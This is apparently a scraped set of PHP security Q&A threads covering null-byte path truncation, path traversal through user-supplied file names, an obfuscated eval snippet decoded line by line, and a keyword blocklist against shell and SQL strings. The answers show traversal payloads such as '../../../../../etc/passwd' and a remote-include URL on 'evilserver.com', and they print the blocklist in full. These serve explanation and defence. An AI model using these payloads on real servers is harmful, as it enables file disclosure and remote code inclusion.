Which special characters can cause a file path to be misinterpreted? - php

For example, there is function (pseudo code):
if ($_GET['path'] ENDS with .mp3 extension) { read($_GET['path']); }
but is it possible, that hacker in a some way, used a special symbol/method, i.e.:
path=file.php^example.mp3
or
path=file.php+example.mp3
or etc...
if something such symbol exists in php, as after that symbol, everything was ignored, and PHP tried to open file.php..
p.s. DONT POST ANSWERS about PROTECTION! I NEED TO KNOW IF THIS CODE can be bypassed, as I AM TO REPORT MANY SCRIPTS for this issue (if this is really an issue).

if something such symbol exists in php, as after that symbol, everything was ignored, and PHP tried to open file.php..
Yes, such a symbol exists; it is called the 'null byte' ("\0").
Because in C (the language used to write the PHP engine) the end of a 'string' is signalled by the null byte. So, whenever a null byte is encountered, the string will end.
If you want the string to end with .mp3 you should manually append it.
Having said that, it is, generally speaking, a very bad idea to accept a user supplied path from a security standpoint (and I believe you are interested in the security aspect of this, because you originally posted this question on security.SE).
Consider the situation where:
$_GET['path'] = "../../../../../etc/passwd\0";
or a variation on this theme.

The leading concept in programming is "Don't trust user input". So the main problem in your case is not a special character its how you work with your data. So you shouldn't use a path given by a user because the user can manipulate the path or other variables.
To escape a user input to prevent bad characters you can use htmlspecialchars or you can filter your get input with filter_input something like that:
$search_html = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);

WE CAN'T TELL IF YOU IF THE CODE CAN BE "BYPASSED" BECAUSE YOU'VE NOT GIVEN US ANY PHP CODE
As to the question of whether its possible to trick PHP into processing a file it shouldn't based on the end of the string, then the answer is only if there is another file somewhere else which has the same ending. However, by default, PHP will happily read from URLs using the same functionality as reading from local files, consider:
http://yourserver.com/yourscript.php?path=http%3A%2F%2Fevilserver.com%2Fpwnd_php.txt%3Ffake_end%3Dmp3

Related

how to decode php base64_decode

I'm a newbie starting to learn from source code. I bought a source code on the internet with full source code switching but it turns out there is a part that is hidden. How to do decrypt/decode for lines like this:
<?php
$keystroke1 = base64_decode("d2RyMTU5c3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJtcA==");
eval(gzinflate(base64_decode('hY5NCsIwEIWv8ixdZDCKWZcuPUfRdqrBmsBkAkrp3aVIi3Tj9v1+vje7PodWfQwNv3zSZAqJyqGNHRdE4+JiVU2ZVHy42fLyjDkoYUT54DdqpHxNKmsAJwtHFXxvksrAYXGort1cE9YsAe1dTJTOzCuEPZbhChN4SPw/iePMd/7ybSmcxeb+4Mj+vkzTBw==')));
$O0O0O0O0O0O0=$keystroke1[2].$keystroke1[32].$keystroke1[20].$keystroke1[11].$keystroke1[23].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
$keystroke2 = $O0O0O0O0O0O0("xes26:tr5bzf{8ydhog`uw9omvl7kicjp43nq", -1);
$OO000OO000OO=$keystroke2[16].$keystroke2[12].$keystroke2[31].$keystroke2[23].$keystroke2[18].$keystroke2[24].$keystroke2[9].$keystroke2[20].$keystroke2[11];
$O0000000000O=$keystroke1[30].$keystroke1[9].$keystroke1[6].$keystroke1[11].$keystroke1[27].$keystroke1[8].$keystroke1[19].$keystroke1[1].$keystroke1[11].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
eval($OO000OO000OO(base64_decode('LcTLsm
tKAADQn7lVZ+8yoBtB3ZH3OyEEMbnl0SLxTJrQvv
5M7hos9C36n38uF4Zh/u+nLDA6cf/VqJpq9PPHq2
IHD+dQlrVwpIa3BPicV2atbjLVsx+to7il1297dn
c+9PeDJGOoGn0MJUJnSqiJwrGcK5/bG2iiJtUoOk
3GKbHYjjzd5yLu3q2dPpWSFjDVTKWSS6MFsF6MU5
dsbJn7qHRxhGo0MNuluk29F3iwyAx/cYO+OfPWi1
ECDkWG1NsMLuAcM3F98vtMsubbvQjf1ZpVMUP5Eh
puFNzCi/CYkoM1VgsAetzjpvEe1M2AlX4YFjQZF0
A0VBRQKS0B5mcI7na2N/nER993+qocgmh9WawUrU
YhBMUiPNpuXNQy2o7VxHvhyO3nZkcWTmQu5kV1C2
ECbZiH8XsL4QuYbf7lI4SF1gDM/vVqRz4qyj7a8b
qS1nXP79731t4O0qcDaqN97BHDzlPwTEF6H7p9a3
Zu1Ut6X5GNTgZhWe3dHa+6yzJ58MX1Pc8mwAWK4v
EVLjGolQQLieOvkn4jD4d0FMQuLYvXhaxbzJyLR2
OHDKhMu2EwHthDt+I7YwOvVUydwEnCigk/n4iQei
SzwWNKicdunzmrVoOWl9gt8lhK+WzNpbPqkHEK7i
xBHT84UAbkHpity8i9eLUUulASI5d7cfpGWF6I4l
7tYBeJmYzXycA3FbbrSb+yNgd8XM5u7wU0mL8tVP
hJ2J/nu2QLr/OgzZrmp7xvKmpZCgHU7w0RlS1PT9
4JvxXtekif9dDGvBxSQjcwj2i32C7Abbcosvey5I
iq2hW7mjn/lUS6OUQ64Kw/v7+///4F')));
?>
is code like this dangerous?
You are looking at a piece of obfuscated code. I will explain it line by line, but first let's go over the functions that are used:
base64_decode()
This function decodes a base64 encoded string. It's used here to unscramble intentionally scrambled code.
gzinflate()
This function decompresses a compressed string. It's used the same way as base64_decode().
eval()
This function executes a string as code. Its use is discouraged and is in itself a bit of a red flag, though it has legitimate uses.
$keystroke1 = base64_decode("d2RyMTU5c3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJtcA==");
This line creates an apparently random string of characters: wdr159sq4ayez7xcgnf_tv8nluk6jhbio32mp
This string is saved to a variable, $keystroke1. The string itself is not important, other than that it contains some letters that are used later.
eval(gzinflate(base64_decode('hY5NCsIwEIWv8ixdZDCKWZcuPUfRdqrBmsBkAkrp3aVIi3Tj9v1+vje7PodWfQwNv3zSZAqJyqGNHRdE4+JiVU2ZVHy42fLyjDkoYUT54DdqpHxNKmsAJwtHFXxvksrAYXGort1cE9YsAe1dTJTOzCuEPZbhChN4SPw/iePMd/7ybSmcxeb+4Mj+vkzTBw==')));
This line unscrambles a doubly scrambled string and then runs this resulting code:
if(!function_exists("rotencode")){function rotencode($string,$amount) { $key = substr($string, 0, 1); if(strlen($string)==1) { return chr(ord($key) + $amount); } else { return chr(ord($key) + $amount) . rotEncode(substr($string, 1, strlen($string)-1), $amount); }}}
This creates a new function called rotencode(), which is yet another way of unscrambling strings.
$O0O0O0O0O0O0=$keystroke1[2].$keystroke1[32].$keystroke1[20].$keystroke1[11].$keystroke1[23].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
This line takes specific characters from that random string from earlier to create the word "rotencode" as a string, stored in the variable named $O0O0O0O0O0O0.
$keystroke2 = $O0O0O0O0O0O0("xes26:tr5bzf{8ydhog`uw9omvl7kicjp43nq", -1);
This line uses the rotencode() function to unscramble yet another string (actually exactly the same string as before, for some reason).
$OO000OO000OO=$keystroke2[16].$keystroke2[12].$keystroke2[31].$keystroke2[23].$keystroke2[18].$keystroke2[24].$keystroke2[9].$keystroke2[20].$keystroke2[11];
$O0000000000O=$keystroke1[30].$keystroke1[9].$keystroke1[6].$keystroke1[11].$keystroke1[27].$keystroke1[8].$keystroke1[19].$keystroke1[1].$keystroke1[11].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
On these lines the two (identical but separate) random strings are used to create the words gzinflate and base64_decode. This is done so the coder can use these functions without it being apparent that that's what is happening. However, base64_decode() is never used this way in the snippet you posted. That might suggest that it is used later in the code in places you haven't seen or recognized yet. Searching your code for "$O0000000000O" might yield other uses.
eval($OO000OO000OO(base64_decode('LcTLsmtKAADQn7lVZ+8yoBtB3ZH3OyEEMbnl0SLxTJrQvv5M7hos9C36n38uF4Zh/u+nLDA6cf/VqJpq9PPHq2IHD+dQlrVwpIa3BPicV2atbjLVsx+to7il1297dnc+9PeDJGOoGn0MJUJnSqiJwrGcK5/bG2iiJtUoOk3GKbHYjjzd5yLu3q2dPpWSFjDVTKWSS6MFsF6MU5dsbJn7qHRxhGo0MNuluk29F3iwyAx/cYO+OfPWi1ECDkWG1NsMLuAcM3F98vtMsubbvQjf1ZpVMUP5EhpuFNzCi/CYkoM1VgsAetzjpvEe1M2AlX4YFjQZF0A0VBRQKS0B5mcI7na2N/nER993+qocgmh9WawUrUYhBMUiPNpuXNQy2o7VxHvhyO3nZkcWTmQu5kV1C2ECbZiH8XsL4QuYbf7lI4SF1gDM/vVqRz4qyj7a8bqS1nXP79731t4O0qcDaqN97BHDzlPwTEF6H7p9a3Zu1Ut6X5GNTgZhWe3dHa+6yzJ58MX1Pc8mwAWK4vEVLjGolQQLieOvkn4jD4d0FMQuLYvXhaxbzJyLR2OHDKhMu2EwHthDt+I7YwOvVUydwEnCigk/n4iQeiSzwWNKicdunzmrVoOWl9gt8lhK+WzNpbPqkHEK7ixBHT84UAbkHpity8i9eLUUulASI5d7cfpGWF6I4l7tYBeJmYzXycA3FbbrSb+yNgd8XM5u7wU0mL8tVPhJ2J/nu2QLr/OgzZrmp7xvKmpZCgHU7w0RlS1PT94JvxXtekif9dDGvBxSQjcwj2i32C7Abbcosvey5Iiq2hW7mjn/lUS6OUQ64Kw/v7+///4F')));
This is where it all comes together. This line unscrambles a line of code which has been compressed and encoded 10 times over. The final result is this:
$cnk = array('localhost');
That's it. It sets the string "localhost" as the sole element of an array and saves it in a variable named $cnk.
In and of itself, there's nothing hazardous about running this code, but noting the lengths that the coder went to in order to hide this line, it's probably a safe bet that it wasn't placed there to help you - the buyer - in any way. Search your code for the $cnk variable if you want to know exactly what's being done. Or better yet, chalk this experience down to a loss and find a better way to learn coding. There are plenty of books, video tutorials and free resources online. Do not place your trust in whoever sold you this code. While they may not have been malicious (people suggested in comments that this might be part of a license check), anyone who includes something like this in their code is not someone you should be learning from.
Good luck on your coding journey!

function to provide some extra security in php with query_string

some years ago I started using the following code including in the top of my pages. I read that was good and used it. But I was wondering, is it helpful?
$page = "index.php";
$cracktrack = $_SERVER['QUERY_STRING'];
$wormprotector = array('chr(', 'chr=', 'chr%20', '%20chr', 'wget%20', '%20wget', 'wget(',
'cmd=', '%20cmd', 'cmd%20', 'rush=', '%20rush', 'rush%20',
'union%20', '%20union', 'union(', 'union=', 'echr(', '%20echr', 'echr%20', 'echr=',
'esystem(', 'esystem%20', 'cp%20', '%20cp', 'cp(', 'mdir%20', '%20mdir', 'mdir(',
'mcd%20', 'mrd%20', 'rm%20', '%20mcd', '%20mrd', '%20rm',
'mcd(', 'mrd(', 'rm(', 'mcd=', 'mrd=', 'mv%20', 'rmdir%20', 'mv(', 'rmdir(',
'chmod(', 'chmod%20', '%20chmod', 'chmod(', 'chmod=', 'chown%20', 'chgrp%20', 'chown(', 'chgrp(',
'locate%20', 'grep%20', 'locate(', 'grep(', 'diff%20', 'kill%20', 'kill(', 'killall',
'passwd%20', '%20passwd', 'passwd(', 'telnet%20', 'vi(', 'vi%20',
'insert%20into', 'select%20', 'nigga(', '%20nigga', 'nigga%20', 'fopen', 'fwrite', '%20like', 'like%20',
'$_request', '$_get', '$request', '$get', '.system', 'HTTP_PHP', '&aim', '%20getenv', 'getenv%20',
'new_password', '&icq','/etc/password','/etc/shadow', '/etc/groups', '/etc/gshadow',
'HTTP_USER_AGENT', 'HTTP_HOST', '/bin/ps', 'wget%20', 'unamex20-a', '/usr/bin/id',
'/bin/echo', '/bin/kill', '/bin/', '/chgrp', '/chown', '/usr/bin', 'g++', 'bin/python',
'bin/tclsh', 'bin/nasm', 'perl%20', 'traceroute%20', 'ping%20', '.pl', '/usr/X11R6/bin/xterm', 'lsof%20',
'/bin/mail', '.conf', 'motd%20', 'HTTP/1.', '.inc.php', 'config.php', 'cgi-', '.eml',
'file://', 'window.open', '<SCRIPT>', 'javascript://','img src', 'img%20src','.jsp','ftp.exe',
'xp_enumdsn', 'xp_availablemedia', 'xp_filelist', 'xp_cmdshell', 'nc.exe', '.htpasswd',
'servlet', '/etc/passwd', 'wwwacl', '~root', '~ftp', '.js', '.jsp', 'admin_', '.history',
'bash_history', '.bash_history', '~nobody', 'server-info', 'server-status', 'reboot%20', 'halt%20',
'powerdown%20', '/home/ftp', '/home/www', 'secure_site, ok', 'chunked', 'org.apache', '/servlet/con',
'<script', '/robot.txt' ,'/perl' ,'mod_gzip_status', 'db_mysql.inc', '.inc', 'select%20from',
'select from', 'drop%20', '.system', 'getenv', 'http_', '_php', 'php_', 'phpinfo()', '<?php', '?>', 'sql=');
$checkworm = str_replace($wormprotector, '*', $cracktrack);
if ($cracktrack != $checkworm){
$cremotead = $_SERVER['REMOTE_ADDR'];
$cuseragent = $_SERVER['HTTP_USER_AGENT'];
header("location:$page");
die();
}
In general, I personally wouldn't use this strategy. I'd rather sanitize each and every input. If a user passes .bash_history in the URL I don't care because it's never going to do anything in my script.
I could maybe see something like this being useful if you had some third-party low reliability script that was available for anyone to hit. Even in that scenario though it seems like a semi-reliable band-aid at best.
For applications you write however, this should hopefully be unnecessary.
Although it's great that you're concerned about security, and you're following the principle of treating all input with suspicion, I don't think that list is terribly useful.
It's a rather arbitrary selection of potentially unwanted strings/commands/tags/folder names and other things. It's likely to get out of date over time, and probably is already. Having a generic list like this is never going to catch everything, and may also lend a false sense of security that your application is secure when really it's not.
As another answer has already mentioned, you want to be checking each input you get from your application (whether via query string variables, POST variables or wherever) and validating that it meets your expectations (e.g. if you're expecting a numeric value, is the value passed in numeric?).
Then if you plan to redisplay or re-use that data, you might want to sanitise if further, and strip out things that might potentially be dangerous in the context where it will be used. For example, you might strip out "script" tags if you're going to display the data on a web page.
If you sanitize all user input properly, there's absolutely no need to use a script like this.
Besides that, it's also case sensitive (str_replace vs str_ireplace) which means that I can easily bypass it by making use of a mix of uppercase and lowercase letters. It also only checks the query string, useless against POST requests.

PHP - alternative to Base64 with shorter results?

I'm currently using base64 to encode a short string and decode it later, and wonder if a better (shorter) alternative is possible.
$string = '/path/to/img/image.jpg';
$convertedString = base64_encode($string);
// New session, new user
$convertedString = 'L3BhdGgvdG8vaW1nL2ltYWdlLmpwZw==';
$originalString = base64_decode('L3BhdGgvdG8vaW1nL2ltYWdlLmpwZw==');
// Can $convertedString be shorter by any means ?
Requirements :
Shorter result possible
Must be reversible any time in a different session (therefore unique)
No security needed (anyone can guess it)
Any kind of characters that can be used in a URL (except slashes)
Can be an external lib
Goal :
Get a clean unique id from a path file that is not the path file and can be used in a URL, without using a database.
I've searched and read a lot, looks like it doesn't exist but couldn't find a definitive answer.
Well since you're using these in a URL, why not use rawurlencode($string) and rawurldecode($encodedString)?
If you can reserve one character like - (i.e., ensure that - never appears in your file names), you can do even better by doing rawurlencode(str_replace('/', '-', $string)) and str_replace('-', '/', rawurldecode($encodedString)). Depending on the file names you pick, this will create IDs that are the same length as the original filename. (This won't work if your file names have multi-byte characters in them; you will need to use some mb_* functions for that case.)
You could try using compression functions, but for strings as short as file paths, compression usually makes the output larger than the input.
Ultimately, unless you are willing to use a database, disallow certain file names, or you know something about what kinds of file names will come up, the best you can hope for is IDs that are as short or almost as short as the original file names. Otherwise, this would be a universal compression function, which is impossible.
I don't think there is anything reliable out there that would significantly shorten the encoded string and keep it URL friendly.
e.g. if you use something like
$test = gzcompress(base64_encode($parameter), 9, ZLIB_ENCODING_DEFLATE);
echo $test;
it would generate characters that are not URL-friendly and any post-transformation would be just a risky mess.
However, you can easily transform text to get URL-friendly parameters.
I use the following code to generate URL-friendly parameters:
$encodedParameter = urlencode(base64_encode($parameter));
And the following code to decode it:
$parameter = base64_decode(urldecode($encodedParameter));
As an alternative solution, you could use generated tokens to map known files using some database.

is_file($_GET) and security

I'm using this code on top of my PHP file for loading cached files and I'm worried whether it's secure enough:
//quick! load from cache if exists!
if (is_file('cache/'.($cachefile=basename('/',$_GET['f']))))
{
header('content-type: text/css');
require('cache/'.$cachefile);
die(); //ALL OK, loaded from cache
}
EDIT: I would also like to know if it isn't, how is it exploitable and how to rewrite it in safe manner.
EDIT 2: I edited code, from previous code, I don't know how I could thought that is_file will filter bad paths >.<
EDIT 3: Changed it again, so it uses basename() instead of end(explode()) and also changed inclusion from repeating the code into assigning the value into variable during first comparison (or file check).
I never just include($_GET), but today, I somehow thought is_file will filter out paths, that may harm my system. I don't know how.
Thank you
I could send $_GET['f'] = '../../database_passwords.xml' ...
Use basename to eliminate anything but the last segment of the passed path. Alternatively, construct the path, then compute the absolute path that corresponds and check if it's still within cache/.
BAD!
What about:
page.php?f=../../../../../etc/password
Never do such things
Check f against a white list or specific pattern like "[a-z]+.php"
No it isn't. I could put '../../anypath' in $_GET['f'] and gain access to any file on your server, even those outside your www root.
[edit]
It would be a lot safer if you would check for '/' and other invalid characters in the value. It is pretty safe if that filename only contains alphanumeric characters and . and _.

Images not uploading when htmlentities has 'UTF-8' set

I have a form that, among other things, accepts an image for upload and sticks it in the database. Previously I had a function filtering the POSTed data that was basically:
function processInput($stuff) {
$formdata = $stuff;
$formdata = htmlentities($formdata, ENT_QUOTES);
return "'" . mysql_real_escape_string(stripslashes($formdata)) . "'";
}
When, in an effort to fix some weird entities that weren't getting converted properly I changed the function to (all that has changed is I added that 'UTF-8' bit in htmlentities):
function processInput($stuff) {
$formdata = $stuff;
$formdata = htmlentities($formdata, ENT_QUOTES, 'UTF-8'); //added UTF-8
return "'" . mysql_real_escape_string(stripslashes($formdata)) . "'";
}
And now images will not upload.
What would be causing this? Simply removing the 'UTF-8' bit allows images to upload properly but then some of the MS Word entities that users put into the system show up as gibberish. What is going on?
**EDIT: Since I cannot do much to change the code on this beast I was able to slap a bandaid on by using htmlspecialchars() rather than htmlentities() and that seems to at least leave the image data untouched while converting things like quotes, angle brackets, etc.
bobince's advice is excellent but in this case I cannot now spend the time needed to fix the messy legacy code in this project. Most stuff I deal with is object oriented and framework based but now I see first hand what people mean when they talk about "spaghetti code" in PHP.
function processInput($stuff) {
$formdata = $stuff;
$formdata = htmlentities($formdata, ENT_QUOTES);
return "'" . mysql_real_escape_string(stripslashes($formdata)) . "'";
}
This function represents a basic misunderstanding of string processing, one common to PHP programmers.
SQL-escaping, HTML-escaping and input validation are three separate functions, to be used at different stages of your script. It makes no sense to try to do them all in one go; it will only result in characters that are ‘special’ to any one of the processes getting mangled when used in the other parts of the script. You can try to tinker with this function to try to fix mangling in one part of the app, but you'll break something else.
Why are images being mangled? Well, it's not immediately clear via what path image data is going from a $_FILES temporary upload file to the database. If this function is involved at any point though, it's going to completely ruin the binary content of an image file. Backslashes removed and HTML-escaped... no image could survive that.
mysql_real_escape_string is for escaping some text for inclusion in a MySQL string literal. It should be used always-and-only when making an SQL string literal with inserted text, and not globally applied to input. Because some things that come in in the input aren't going immediately or solely to the database. For example, if you echo one of the input values to the HTML page, you'll find you get a bunch of unwanted backslashes in it when it contains characters like '. This is how you end up with pages full of runaway backslashes.
(Even then, parameterised queries are generally preferable to manual string hacking and mysql_real_escape_string. They hide the details of string escaping from you so you don't get confused by them.)
htmlentities is for escaping text for inclusion in an HTML page. It should be used always-and-only in the output templating bit of your PHP. It is inappropriate to run it globally over all your input because not everything is going to end up in an HTML page or solely in an HTML page, and most probably it's going to go to the database first where you absolutely don't want a load of < and & rubbish making your text fail to search or substring reliably.
(Even then, htmlspecialchars is generally preferable to htmlentities as it only encodes the characters that really need it. htmlentities will add needless escaping, and unless you tell it the right encoding it'll also totally mess up all your non-ASCII characters. htmlentities should almost never be used.)
As for stripslashes... well, you sometimes need to apply that to input, but only when the idiotic magic_quotes_gpc option is turned on. You certainly shouldn't apply it all the time, only when you detect magic_quotes_gpc is on. It is long deprecated and thankfully dying out, so it's probably just as good to bomb out with an error message if you detect it being turned on. Then you could chuck the whole processInput thing away.
To summarise:
At start time, do no global input processing. You can do application-specific validation here if you want, like checking a phone number is just numbers, or removing control characters from text or something, but there should be no escaping happening here.
When making an SQL query with a string literal in it, use SQL-escaping on the value as it goes into the string: $query= "SELECT * FROM t WHERE name='".mysql_real_escape_string($name)."'";. You can define a function with a shorter name to do the escaping to save some typing. Or, more readably, parameterisation.
When making HTML output with strings from the input or the database or elsewhere, use HTML-escaping, eg.: <p>Hello, <?php echo htmlspecialchars($name); ?>!</p>. Again, you can define a function with a short name to do echo htmlspecialchars to save on typing.

Categories